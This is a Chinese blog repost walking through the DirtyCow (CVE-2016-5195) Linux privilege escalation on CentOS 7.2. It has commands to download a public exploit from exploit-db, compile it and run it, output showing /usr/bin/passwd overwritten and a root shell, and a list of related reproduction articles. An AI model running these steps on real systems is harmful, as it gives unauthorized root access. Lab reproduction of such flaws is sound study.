关于脏牛

最新推荐文章于 2024-03-26 18:15:00 发布
最新推荐文章于 2024-03-26 18:15:00 发布
阅读量526 收藏
点赞数
文章标签: shell
原文链接:http://www.cnblogs.com/hookjoy/p/6996542.html
版权

测试平台:CentOS7.2

编译工具GCC

mkdir cowroot

cd cowroot 
wget https://www.exploit-db.com/download/40616

mv 40616 cowroot.c
gcc cowroot.c -o cowroot -pthread

这时会发现GCC编译器有警告,不要管,当前目录下已经编译完成cowwroot文件了
执行cowroot

./cowroot

  • 执行

DirtyCow root privilege escalation
Backing up /usr/bin/passwd.. to /tmp/bak
Size of binary: 57048
Racing, this may take a while..
/usr/bin/passwd is overwritten
Popping root shell.
Don't forget to restore /tmp/bak
thread stopped
thread stopped

会发现用户已经变为root


但这里有一个问题,在执行EXP之后十几秒后,系统会卡死,在kali2.0(debian)  CentOS7.2 
ubuntu14.04测试都卡死
这样就算到时候利用这个漏洞提权成功,卡死后也没用了,只能重新登陆

方法是关闭pdfflush刷新,防止死机

转载于:https://www.cnblogs.com/hookjoy/p/6996542.html

weixin_33941350
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DirtyCow脏牛漏洞复现(CVE-2016-5195)
tpaer的博客
11-16 2783
本文以vulnhub靶场中的lampiao为例复现脏牛提权漏洞
DirtyCow脏牛)漏洞复现
Brucetg的博客
08-20 2万+
该文章首发于: 90sec(九零) 文章链接: https://forum.90sec.com/t/topic/521 这几天发现90sec需要登录才能浏览文章,为了方便就把该文章也发在个人博客,并顺便把之前编译好的脏牛提权EXP也一块放出来。 编译好的EXP下载地址: https://github.com/Brucetg/DirtyCow-EXP 该漏洞是 Linux 内核的内存子...
DirtyCow-EXP:编译好的脏牛漏洞(CVE-2016-5195)EXP
05-16
DirtyCow-EXP 编译好的脏牛漏洞(CVE-2016-5195)EXP,分为 Linux 平台 和 Android 平台。 漏洞详细复现过程请参考:
脏牛(Dirty Cow)快速指南
weixin_34061555的博客
11-09 2634
什么是DirtyCow 脏牛(Dirty Cow)是Linux内核的一个提权漏洞,攻击者可以利用这个漏洞获取root权限。之所以叫Dirty Cow,因为这个漏洞利用了Linux的copy-on-write机制。脏牛的CVE编号是CVE-2016-5195。 怎么判断我的系统是不是受影响 脏牛的影响范围很大,几乎涵盖了主流的Linux发行版。要判断系统是...
脏牛提权复现(CVE-2016-5159)
qq_40671478的博客
09-02 1721
脏牛提权(CVE-2016-5159) 漏洞原理: 该漏洞的原因是get_user_page内核函数在处理Copy-on-Write(以下使用COW表示)的过程中,可能产出竞态条件造成COW过程被破坏,导致出现写数据到进程地址空间内只读内存区域的机会。当我们向带有MAP_PRIVATE标记的只读文件映射区域写数据时,会产生一个映射文件的复制(COW),对此区域的任何修改都不会写回原来的文件,如果上述的竞态条件发生,就能成功的写回原来的文件。比如我们修改su或者passwd程序就可以达到提权root的目的。
dirtycow脏牛linux提权exp
03-25
这个漏洞利用了Linux内核中的一个内存管理错误,允许本地非特权用户获取root权限,进行权限提升,因此在网络安全领域中被称为“脏牛”提权漏洞。 在Linux操作系统中,Copy-on-Write(COW)是一种内存管理策略,用于...
新版脏牛Linux内核提权漏洞CVE-2022-0847
03-09
5.8 中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。 修复版本:Linux 5.16.11、5.15.25 和 5.10.102 中修复。
android系统dirty cow(脏牛)漏洞的检查资料
03-22
`test.txt`文件很可能是提供关于如何运行和解读`dirtycowtest`程序的说明,包括步骤、预期结果以及如何判断设备是否被脏牛漏洞影响的指南。文档可能还会解释如何在不同的Android版本或设备上进行测试,以及如何在...
脏牛提权靶机
m0_73482536的博客
05-10 239
练习的靶机
xss、脏牛提权.zip
06-18
《XSS与脏牛提权:深度解析与实践》 XSS(Cross-site scripting)攻击是一种常见的网络安全问题,它利用了网站对用户输入数据的信任,将恶意脚本注入到网页中,进而对用户进行攻击。在给定的“xss注入闯关小游戏”...
【CVE复现NO.00001】“脏牛”漏洞CVE-2016-5195复现及简要分析
arttnba3的博客
04-16 3931
【CVE复现NO.00001】CVE-2016-5195复现及简要分析[github blog addr](https://arttnba3.cn/2021/04/08/NOTE-0X04-CVE-2016-5195/)0x00.一切开始之前一、写时复制机制(Copy-on-Write)basic COWmmap 与 COW二、缺页异常(page fault)分类①软性缺页异常(soft page fault)②硬性缺页异常(hard page fault)③无效缺页异常(invalid page faul
Linux脏牛(CVE-2016-5195)提权保姆级教程
weixin_68408599的博客
08-17 3383
对CVE-2016-5159提权的保姆级的教程
五、Linux 脏牛本地提权 漏洞(CVE-2016-5195)(kernel2.6.22-----3.2)
qwsn
10-19 3962
一、漏洞分析 漏洞 漏洞用来做什么 适用于ubuntu的哪些内核版本 CVE-2016-5195 本地提权 2.6.22—3.2 二、靶机环境 靶机虚拟机网盘地址 提取码 靶机信息 修改内核为3.13的方法 https://pan.baidu.com/s/1vVnQ-Ih1JluahuDuBZUALw&shfl=sharepset ceeh ubuntu...
脏牛提权(靶机复现)
最新发布
tubug的博客
03-26 2432
脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。漏洞范围Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复)漏洞编号脏牛的CVE编号是CVE-2016-5195。漏洞危害低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权漏洞原理。
『vulnhub系列』lampiao渗透—脏牛提权(CVE-2016-5195)
越努力 越自由
03-20 4763
vulnhub里面的一个靶场,涉及到drupal7 cms远程代码执行漏洞(CVE-2018-7600)和脏牛提权。 该脚本会自动检测linux下可能存在的提权漏洞
Lampiao 脏牛提权(CVE-2016-5195)
m0_64118193的博客
08-30 831
漏洞编号漏洞名称:脏牛提权漏洞危害:低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权,获取root权限影响范围:Linux内核>=2.6.22(2007年发行)开始就受了影响了,直到2016年10月18日才修复链接:靶场下载地址,提取码链接:提权文件下载地址,提权码zp3j。...
【原创】贴个dirtycow脏牛漏洞)不死机的exploit
weixin_34150224的博客
01-04 558
dirtycow官网上几个获得rootshell的exp大都会导致机器死机,在原作者的基础上改进了一下,做个记录: /* * (un)comment correct payload first (x86 or x64)! * * $ gcc cowroot.c -o cowroot -pthread * $ ./cowroot * DirtyCow root privilege ...
记一次杀猪盘的渗透之旅
wulanlin的博客
12-28 2374
所谓“杀猪盘”,是指诈骗分子利用网络交友通常是“异性”交友,诱导受害人下载诈骗APP并在上面进行各种“投资”,如菠菜、股票、期货甚至虚拟货币的网络诈骗。今年某月某日小白就遭遇了这种骗局,他先是被骗子通过QQ添加并下载了一个名为”心动“的APP,在“心动“APP上结识了位名为“xx老师”的美女,小白被美色迷了眼打算相约这名网友,但是美女则借口让他下载另一个名为午夜乐园的APP进行投资,果不其然小白被成功骗取10余万。 0x01 APP测试准备 根据小白的描述,我们关注到以下几点信息,分别是 QQ、“心动”
Linux系统管理----centos7系统进程管理
热门推荐
m0_57911290的博客
03-06 3万+
目录 一、进程概念 1.进程组成部分: 2.僵尸进程: 3.线程: 4.上下文切换: 5.中断处理: 6.进程的属性 二、ps查看进程工具 1.-aux弹出消息及详解 2、linux进程有5种基本状态 三、free 查看内存使用情况 1.弹出消息及详解: 三、uptime 查看系统负载 1.弹出消息含意如下: 四、top 命令 动态性能分析工具 1.每行信息 2.top 快捷键: 五、lsof 命令 用于查看你进程调用、打开的文件 六、kill 关闭进程 1)ki
linux远程脏牛提权
06-11
"脏牛"漏洞是Linux内核中的一个本地提权漏洞,攻击者可以利用该漏洞在受害者系统上获得root权限。如果您想要远程利用该漏洞进行提权,需要首先在目标系统上获取访问权限。 一种方法是使用SSH连接到目标系统,然后...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值